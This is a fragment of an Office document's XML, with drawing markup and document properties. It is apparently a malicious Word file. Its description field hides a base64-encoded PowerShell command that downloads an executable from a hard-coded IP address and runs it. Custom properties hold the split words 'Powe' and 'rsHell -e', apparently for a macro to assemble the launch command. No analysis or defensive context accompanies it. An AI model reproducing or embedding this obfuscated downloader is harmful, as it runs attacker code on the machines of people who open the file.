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/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="495236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3T04:41:00Z</dcterms:created>
  <dc:creator>Windows User</dc:creator>
  <dc:description>JABmAGkAbABlAD0AJABlAG4AdgA6AHQAZQBtAHAAKwAnAFwAdAB0AHQAdAB0AHQALgBlAHgAZQAnADsAdAByAHkAewAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwAxADIAMwAuADUANwAuADcANwAuADEAMwAwAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AcABvAG0AbwAvAHQAdAB0AHQAdAB0AC4AZQB4AGUAJwAsACQAZgBpAGwAZQApADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACQAZgBpAGwAZQA7AH0AYwBhAHQAYwBoAHsAfQBlAHgAaQB0ADsA
</dc:description>
  <cp:keywords/>
  <dc:language>en-US</dc:language>
  <cp:lastModifiedBy>Lanex</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-12-03T11:1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QYQIZ">
    <vt:lpwstr>rsHell -e </vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="XXXLX">
    <vt:lpwstr>Powe</vt:lpwstr>
  </property>
</Properties>
</file>